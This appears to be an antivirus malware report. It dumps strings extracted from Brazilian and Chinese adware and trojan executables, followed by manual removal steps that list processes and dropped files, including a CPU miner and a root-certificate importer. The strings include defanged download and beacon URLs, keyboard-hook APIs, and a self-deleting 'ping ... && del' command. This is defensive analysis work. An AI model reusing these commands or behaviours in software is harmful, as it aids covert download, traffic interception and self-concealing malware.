List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

DesProtetor.exe_4032:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\po_update.exe
hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.brsoftwarellc.com/services/update.php?v=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start SaveSys
cmd.exe /c net stop SaveSys
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
5l6O6W6
< <$<(<,<0<4<8<<<
?!?%?)?-?1?5?9?=?
5%6x6
1 1$1(1,1014181
0&0.080=0
2%3)3-31383
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
=!=,=7=?=_=
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3034383<3@3
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
A.mi*#9$
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

ProtectWindowsManager.exe_3736:




.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
?456789:;<=
!"#$%&'()* ,-./0123
SHELL32.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
SHLWAPI.dll
%dYeArdMoNthdDaY
URLDownloadToFileA
file_url
ShellExecuteExW
SHDeleteKeyW
GetWindowsDirectoryA
GetProcessHeap
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegCreateKeyExW
RegCloseKey
RegOpenKeyExW
RegCreateKeyW
ReportEventW
ADVAPI32.dll
PSAPI.DLL
USERENV.dll
VERSION.dll
GetCPInfo
zcÁ
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
263f3k3z3
=>>_> ?`?}?
5 5$5(5,5
? ?$?(?,?0?4?8?<?
:$:,:8:\:|:
%s_%s
\\.\Phys
..\Src\json\src\json_value.cpp
..\Src\json\src\json_reader.cpp
xxxx
..\Src\json\src\json_writer.cpp
kernel32.dll
mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
USER32.DLL
portuguese-brazilian
WindowsMangerProtect
SOFTWARE\supWindowsMangerProtect
xa.geoip
visit.heartbeat
ProtectWindowsManager.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
TypesSupported
%s is already installed
%s installed
%s failed to install. Error %d
%s is not installed
Could not remove %s. Error %d
WindowsProtectManger
Advapi32.dll
/c ping 127.0.0.1 -n 2 > nul && del
"%s" %s
psapi.dll
Explorer.exe
urlmon.dll
update.exe
Assertion failed: %s, file %s, line %d
WindowsMangerProtect Service
C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe
WindowsMangerProtect service
SysTool PasSame LIMITED
Windows SysTool Svr
20.0.0.2227
Windows SysTool.exe

HPNotify.exe_3640:




.text
`.rdata
@.data
.rsrc
@.reloc
<9%uo
wszUrl
strUrlTemp
hKEY
strSelUrl
strUrl
strConfUrlTemp
strDsUrl
strHpUrl
strCmdLine
tCPW
%UUUU
e_GetBrowserCurrentHpUrl
e_GetBrowserCurrentDsUrl
URLDownloadToFileW
URLDownloadToFileW ret:0XX
Error : %d
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.1.3
monochrome
unsupported bit depth
`'\%D,3
Run-Time Check Failure #%d - %s
%s%s%p%s%ld%s%d%s
%s%s%s%s
RegOpenKeyExW
RegCloseKey
del /s/q %1\*.*
%suninstall.bat
E:\supsoft\SupSearchProtectV4\SearchProtect\bin\Release\HPNotify.pdb
KERNEL32.dll
GetKeyState
USER32.dll
GDI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteA
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHDeleteKeyW
SHLWAPI.dll
MSVCP110.dll
MSVCR110.dll
_calloc_crt
_CRT_RTC_INITW
__crtGetShowWindowMode
_amsg_exit
_wcmdln
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
__crtSetUnhandledExceptionFilter
GdiplusShutdown
gdiplus.dll
IMM32.dll
DeleteUrlCacheEntryW
WININET.dll
COMCTL32.dll
GetProcessHeap
#*1892 $
%,3:;4-&
.?AVCActiveXEnum@DuiLib@@
.?AVCWebBrowserUI@DuiLib@@
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
3?3
1-2}2
77t7
9":,:6:@:
12u2
9 9$9(9,9094989<9
0 1@1\1|1
hXXp://VVV.bing.com/
hXXp://VVV.yahoo.com/
hXXp://VVV.google.com/
%sconf
web/?type=dspp&
web/?type=dspp
hXXp://VVV.v9.com/
Itemd
BrowserAction.dll
%u_%u
%s_%s
%s_X
\\.\PhysicalDrive%d
\\.\Scsi%d:
UrlEdit
conf.xml
hXXp://v9.com/license_agreement.html
hXXp://v9.com/privacy_policy.html
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.show.%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.other.%s
%stmp%d.tmp
urlmon.dll
main.xml
explorer.exe
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
IeWatchDog.dll
BrowerWatchFF.dll
BrowerWatchCH.dll
Global\GUID(6D05BFEC-4307-4649-8963-962A24345DF4)
msimg32.dll
User32.dll
WM_KEYDOWN
WM_KEYUP
WM_SYSKEYDOWN
WM_SYSKEYUP
0xX
keyboard
msftedit.dll
password
%s%s%s
Correct password required
%s\%s
WebBrowser
transshadow
transshadow1
dest='%d,%d,%d,%d'
dest='%d,%d,%d,%d' source='%d,%d,%d,%d'
source='%d,%d,%d,%d' dest='%d,%d,%d,%d'
M-d-d
WebBrowserUI
errorUrl
{D27CDB6E-AE6D-11CF-96B8-444553540000}
user32.dll
MSPDB110.DLL
ADVAPI32.DLL
/c ping 127.0.0.1 -n 2 > nul && del /s/q
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
%Program Files% (x86)\XTab\skin\
SupHPNot.exe
4,0,1,2253
SupHPNty.exe

ProtectService.exe_3668:




.text
`.rdata
@.data
.rsrc
@.reloc
GET %s%s%s HTTP/1.1
Host: %s
%sUser-Agent: Mozilla/4.0
POST %s HTTP/1.1
%sContent-Type: %s
User-Agent: Mozilla/4.0
Content-Length: %u
%*s %d %*s
%*[ ]%[^
?456789:;<=
!"#$%&'()* ,-./0123
file_url
E:\supsoft\SupSearchProtectV4\SearchProtect\Bin\Release\ProtectService.pdb
GetProcessHeap
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegOpenKeyW
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
MSVCP110.dll
InternetCrackUrlW
WININET.dll
WS2_32.dll
SHLWAPI.dll
MSVCR110.dll
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
_calloc_crt
__crtGetShowWindowMode
_amsg_exit
_wcmdln
__crtSetUnhandledExceptionFilter
WinHttpCloseHandle
WinHttpOpen
WinHttpSetTimeouts
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetOption
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetProxyForUrl
WinHttpWriteData
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WINHTTP.dll
SensApi.dll
VERSION.dll
PSAPI.DLL
USERENV.dll
.?AVCHttpClient@@
.?AVCTcpipSocket@@
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
2-2v2
hXXp://
Software\Microsoft\Windows\CurrentVersion\Internet Settings
http=
WinHttpClient
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
hXXp://xa.xingcloud.com
xxxx
%u_%u
%s_%s
%s_X
\\.\PhysicalDrive%d
UpDateProcess.exe
hXXp://VVV.theviilage.com/searchprotect/up?ptid=%s&sid=%s&ln=%s_%s&ver=%s&uid=%s&dp=%s
g{2EFFE99D-743D-44D0-BBF2-F9DDDEA2F92D}
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
Report HeartBeat
cmdshell.exe
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=visit.heartbeat.%s&update0=ref,%s&update1=nation,%s&update2=language,%s&update3=version,%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action0=xa.geoip&action1=visit&action2=install
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=uninstall
explorer.exe
Advapi32.dll
"%s" %s
psapi.dll
Explorer.exe
json_value.cpp
ljson_reader.cpp
ProtectSvc.exe
4.0.1.2253






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    ProtectService.exe:3580
    ProtectService.exe:3668
    g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884
    ProtectWindowsManager.exe:3736
    ProtectWindowsManager.exe:3316
    import_root_cert.exe:3188
    15094FED_stp.EXE:3668
    cpuminer-x11opt-setup.exe:3752
    DesProtetor.exe:536
    wpm_v20.0.0.2227.exe:3268
    g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948
    QQBrowser.exe:3824
    QQBrowser.exe:3212
    g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816
    powershell.exe:3772
    powershell.exe:3656
    powershell.exe:3376
    g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564
    g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480
    XTab_Setup2253.exe:1748
    cmdshell.exe:3596
    g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400
    amisid.exe:3516
    g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024
    nfregdrv.exe:3588
    nfregdrv.exe:3076
    nfregdrv.exe:1648
    nfregdrv.exe:3924
    nfregdrv.exe:3192
    HPNotify.exe:3640
    CashReminder.exe:3984
    g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520
    ActSys.exe:148
    certutil.exe:3280
    g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268
    amisetup2899__9664.exe:3368
    GOSafer.exe:3264
    WNet.exe:4016
    310714_is.exe:948
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %Program Files% (x86)\XTab\msvcp110.dll (536 bytes)
    %Program Files% (x86)\XTab\msvcr110.dll (876 bytes)
    %Program Files% (x86)\XTab\CmdShell.exe (32 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\mt-core[1].js (42633 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\contabilizar[1].htm (162 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[1] (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\icone_cadeado[1].gif (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\verificar_ip[1].htm (105 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\error[1] (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll (20 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\i[1].gif (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\top-line[1].gif (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\8Hk4o[1].htm (185 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\SL2[1].gif (43 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\carregando[1].gif (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\s9[1].gif (43 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\warning[1] (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310113f8[1].htm (1006 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\010914i[1].htm (308 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BD.tmp (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\MobiMidia_validation[1].js (865 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\150814c[1].htm (637 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\carregando3[1].gif (1 bytes)
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\up[1].htm (1 bytes)
    C:\ProgramData\WindowsMangerProtect\update\conf (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\certutil.exe (90 bytes)
    %Program Files% (x86)\DesProtetor\uninst.exe (1305 bytes)
    %Program Files% (x86)\DesProtetor\nfregdrv.exe (1601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2A2C.tmp (74611 bytes)
    %Program Files% (x86)\DesProtetor\ssleay32.dll (12088 bytes)
    %Program Files% (x86)\DesProtetor\nfapi.dll (4992 bytes)
    %Program Files% (x86)\DesProtetor\desprotetordrv.sys (1856 bytes)
    C:\Windows\System32\drivers\desprotetordrv.sys (51 bytes)
    %Program Files% (x86)\DesProtetor\libeay32.dll (35507 bytes)
    %Program Files% (x86)\DesProtetor\DesProtetor.exe (15982 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\SimpleSC.dll (1921 bytes)
    %Program Files% (x86)\DesProtetor\ProtocolFilters.dll (9320 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\CPUFeatures.dll (20 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\System.dll (23 bytes)
    C:\Windows\System32\cpuminer-gw64.exe (41231 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll (12 bytes)
    C:\Windows\System32\cpuminer-conf.json (420 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\cpuminer\cpuminer-uninst.exe (1279 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\UserInfo.dll (8 bytes)
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[5].txt (111 bytes)
    C:\Windows\Temp\P_RuleList.txt (111 bytes)
    C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe (2444 bytes)
    %Program Files% (x86)\ActSys\asfilterdrv.sys (1856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SelfDel.dll (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
    %Program Files% (x86)\ActSys\ssleay32.dll (12088 bytes)
    %Program Files% (x86)\ActSys\remove_ActSys.exe (313 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\System.dll (23 bytes)
    C:\Windows\System32\drivers\asfilterdrv.sys (56 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\nsExec.dll (14 bytes)
    %Program Files% (x86)\ActSys\ProtocolFilters.dll (38495 bytes)
    %Program Files% (x86)\ActSys\ActSys.exe (15990 bytes)
    %Program Files% (x86)\ActSys\libeay32.dll (35507 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SimpleSC.dll (1921 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscF0B5.tmp (140252 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
    %Program Files% (x86)\ActSys\nfregdrv.exe (1601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\NJaxIntermediate.cer (774 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
    %Program Files% (x86)\ActSys\nfapi.dll (4992 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\import_root_cert.exe (3406 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\RegWrite.exe (86 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.2227.exe (676 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ChromeSync.exe (286 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\XTab_Setup2253.exe (148 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\479.db (288 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WebDataJs (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ClearnC.exe (114 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\icon.png (628 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\index.html (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\aes.js (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code1.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\default_logo.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery.autocomplete.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\479.json (512 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\newtab.ico (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\xagainit.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\mostgrid.js (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code2.jpg (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\misc.js (11 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button1.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\settings.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\google_trends.png (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\common.js (10 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox_select.png (783 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\MessageBox.xml (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code5.jpg (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en-US\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\js.js (660 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pl\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg1.png (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\simple.css (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CH\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bk_shadow.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\preferences.js (379 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_bg.png (159 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\scrollbar.bmp (37 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\addonmanager.js (531 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code4.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-TW\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (196 bytes)
